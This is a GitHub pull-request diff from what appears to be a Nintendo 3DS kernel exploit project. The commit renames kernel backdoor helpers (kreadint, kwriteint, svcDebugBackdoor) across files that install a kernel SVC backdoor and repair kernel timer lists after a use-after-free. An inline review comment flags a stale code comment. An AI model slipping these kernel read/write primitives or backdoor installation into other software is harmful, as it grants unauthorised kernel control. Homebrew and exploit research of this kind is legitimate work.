Merge pull request #53 from d3m3vilurr/fix-wrong-kernel-function
Fix use of the wrong backdoor function and refactor function names
nedwill authored Jan 9, 2017
2 parents 79ee164 + d8b29a1 commit 8fe7342
Showing 6 changed files with 37 additions and 37 deletions.
14 changes: 7 additions & 7 deletions include/backdoor.h
Expand Up @@ -6,23 +6,23 @@
bool backdoor_installed;

/* ASM SVC stubs */
Result svcMyBackdoor(s32 (*callback)(void));
Result svcDebugBackdoor(s32 (*callback)(void));
Result svcGlobalBackdoor(s32 (*callback)(void));

/* Luma backdoor */
void kmemcpy(void *dst, void *src, u32 len);
void kwriteint(u32 *addr, u32 value);
u32 kreadint(u32 *addr);
bool mybackdoor_installed();
void kmemcpy_debug(void *dst, void *src, u32 len);
void kwriteint_debug(u32 *addr, u32 value);
u32 kreadint_debug(u32 *addr);
bool debug_backdoor_installed();
void print_array_wait(char *name, u32 *addr, u32 size);
void *get_object_addr(Handle handle);
/* Used in testing exploit */
void kernel_randomstub(u32 *arg);
bool get_timer_value(Handle timer, u64 *initial, u64 *interval);

/* Real backdoor */
u32 kreadint_real(u32 *addr);
void kwriteint_real(u32 *addr, u32 value);
u32 kreadint(u32 *addr);
void kwriteint(u32 *addr, u32 value);
bool global_backdoor_installed(void);
/* Used in real exploit, must be called from kernel mode. */
void install_global_backdoor(void);
42 changes: 21 additions & 21 deletions source/backdoor.c
Expand Up @@ -37,32 +37,32 @@ static void memcpy_int() {
memcpy(memcpy_dst, memcpy_src, memcpy_len);
}

void kmemcpy(void *dst, void *src, u32 len) {
void kmemcpy_debug(void *dst, void *src, u32 len) {
memcpy_dst = dst;
memcpy_src = src;
memcpy_len = len;
svcMyBackdoor((s32(*)(void)) & memcpy_int);
svcDebugBackdoor((s32(*)(void)) & memcpy_int);
}

void kwriteint(u32 *addr, u32 value) {
void kwriteint_debug(u32 *addr, u32 value) {
writeint_arg_addr = addr;
writeint_arg_value = value;
svcMyBackdoor((s32(*)(void)) & writeint);
svcDebugBackdoor((s32(*)(void)) & writeint);
}

static void readint() { readint_res = *readint_arg; }

u32 kreadint(u32 *addr) {
u32 kreadint_debug(u32 *addr) {
if (addr == 0) {
printf("kreadint(NULL) -> 0\n");
printf("kreadint_debug(NULL) -> 0\n");
return 0;
}
readint_arg = addr;
svcMyBackdoor((s32(*)(void)) & readint);
svcDebugBackdoor((s32(*)(void)) & readint);
return readint_res;
}

u32 kreadint_real(u32 *addr) {
u32 kreadint(u32 *addr) {
if (addr == 0) {
printf("kreadint(NULL) -> 0\n");
return 0;
Expand All @@ -72,19 +72,19 @@ u32 kreadint_real(u32 *addr) {
return readint_res;
}

void kwriteint_real(u32 *addr, u32 value) {
void kwriteint(u32 *addr, u32 value) {
writeint_arg_addr = addr;
writeint_arg_value = value;
svcGlobalBackdoor((s32(*)(void)) & writeint);
}

bool mybackdoor_installed() {
bool debug_backdoor_installed() {
/* kwriteint won't have a side effect if it's not installed.
* that svc is normally callable by userspace but returns
* an error.
*/
static u32 installed = 0;
kwriteint(&installed, 1);
kwriteint_debug(&installed, 1);
return installed;
}

Expand All @@ -105,7 +105,7 @@ bool global_backdoor_installed() {
}

void print_array_wait(char *name, u32 *addr, u32 size) {
if (!mybackdoor_installed()) {
if (!debug_backdoor_installed()) {
printf("can't print array, no backdoor\n");
return;
}
Expand All @@ -114,7 +114,7 @@ void print_array_wait(char *name, u32 *addr, u32 size) {
return;
}
for (u32 i = 0; i < size / 4; i++) {
printf("%s[%ld]: 0x%lx\n", name, i, kreadint(&addr[i]));
printf("%s[%ld]: 0x%lx\n", name, i, kreadint_debug(&addr[i]));
if (i && (i % 16 == 0)) {
printf("still going: waiting for <start>\n");
wait_for_user();
Expand All @@ -138,18 +138,18 @@ static void kernel_get_object_addr() {
}

void *get_object_addr(Handle handle) {
if (!mybackdoor_installed()) {
printf("get_object_addr: mybackdoor not installed.\n");
if (!debug_backdoor_installed()) {
printf("get_object_addr: debug_backdoor not installed.\n");
return NULL;
}
get_object_handle = handle;
svcMyBackdoor((s32(*)(void)) & kernel_get_object_addr);
svcDebugBackdoor((s32(*)(void)) & kernel_get_object_addr);
if (get_object_ret) {
u32 *obj = get_object_ret;
u32 *refcount_addr = &obj[1];
u32 refcount = kreadint(refcount_addr);
u32 refcount = kreadint_debug(refcount_addr);
if (refcount > 0) {
kwriteint(refcount_addr, refcount - 1);
kwriteint_debug(refcount_addr, refcount - 1);
} else {
printf("wtf? object is in table with 0 refcount?");
}
Expand All @@ -173,7 +173,7 @@ void kernel_randomstub(u32 *arg) {
return;
}
randomstub_arg = arg;
svcMyBackdoor((s32(*)(void)) & randomstub_wrapper);
svcDebugBackdoor((s32(*)(void)) & randomstub_wrapper);
}

static Result kernel_backdoor(s32 (*callback)(void)) { return callback(); }
Expand Down Expand Up @@ -243,11 +243,11 @@ bool get_timer_value(Handle timer, u64 *initial, u64 *interval) {
}

if (initial) {
kmemcpy(initial, &timer_addr[6], sizeof(u64));
kmemcpy_debug(initial, &timer_addr[6], sizeof(u64));
}

if (interval) {
kmemcpy(interval, &timer_addr[5], sizeof(u64));
kmemcpy_debug(interval, &timer_addr[5], sizeof(u64));
}

return true;
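Review bot: The comment inside debug_backdoor_installed() still reads `kwriteint won't have a side effect if it's not installed`, but after this commit `kwriteint` names the global-backdoor writer while the probe two lines below now calls `kwriteint_debug`, so the comment points a reader at the wrong function. Suggest `/* kwriteint_debug has no side effect when the debug backdoor is not installed: the svc is normally callable from userspace but just returns an error. */`. The renamed `svcDebugBackdoor(...)` calls in kmemcpy_debug, kwriteint_debug, kreadint_debug, get_object_addr and kernel_randomstub all discard the returned Result, so a failed svc silently leaves readint_res stale; that predates the change, but a one-line `// TODO: check Result` at the first call would record it. The kreadint_debug/kreadint bodies and global_backdoor_installed extend beyond the shown hunks.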
8 changes: 4 additions & 4 deletions source/backdoor_asm.s
@@ -1,11 +1,11 @@
.arm
.align 4

.section .text.svcMyBackdoor, "ax", %progbits
.global svcMyBackdoor
.type svcMyBackdoor, %function
.section .text.svcDebugBackdoor, "ax", %progbits
.global svcDebugBackdoor
.type svcDebugBackdoor, %function
.align 2
svcMyBackdoor:
svcDebugBackdoor:
svc 0x2f
bx lr

6 changes: 3 additions & 3 deletions source/cleanup.c
Expand Up @@ -65,7 +65,7 @@ static void *find_orphan() {
}

/* account for list head */
void *first_freed = (void *)kreadint_real(ktimer_pool_head);
void *first_freed = (void *)kreadint(ktimer_pool_head);
if (first_freed) {
reachable[TOBJ_ADDR_TO_IDX(ktimer_base, first_freed)] = true;
}
Expand All @@ -90,7 +90,7 @@ static void **find_parent() {
// traverse linked list until next points to userspace
void *current_node = ktimer_pool_head;
while (true) {
void *next = (void *)kreadint_real(current_node);
void *next = (void *)kreadint(current_node);

if (next == (void *)TIMER2_NEXT_KERNEL) {
return current_node;
Expand Down Expand Up @@ -122,6 +122,6 @@ bool cleanup_uaf() {

printf("Found parent and orphan: %p -> %p\n", parent, orphan);

kwriteint_real((u32 *)parent, (u32)orphan);
kwriteint((u32 *)parent, (u32)orphan);
return true;
}
2 changes: 1 addition & 1 deletion source/exploit.c
Expand Up @@ -44,7 +44,7 @@ static u32 fptrs[16] = {
(u32)&install_global_backdoor,
};

/* if the UAF succeeded, setup mybackdoor */
/* if the UAF succeeded, setup global_backdoor */
static bool try_setup_global_backdoor() {
Handle timer, timer2;
Result res;
2 changes: 1 addition & 1 deletion source/timer.c
Expand Up @@ -127,7 +127,7 @@ bool initialize_timer_state() {
return false;
}

if (mybackdoor_installed()) {
if (debug_backdoor_installed()) {
u64 initial = 0;
if (!get_timer_value(timer2, &initial, NULL)) {
printf("set_timer: get_timer_value failed\n");
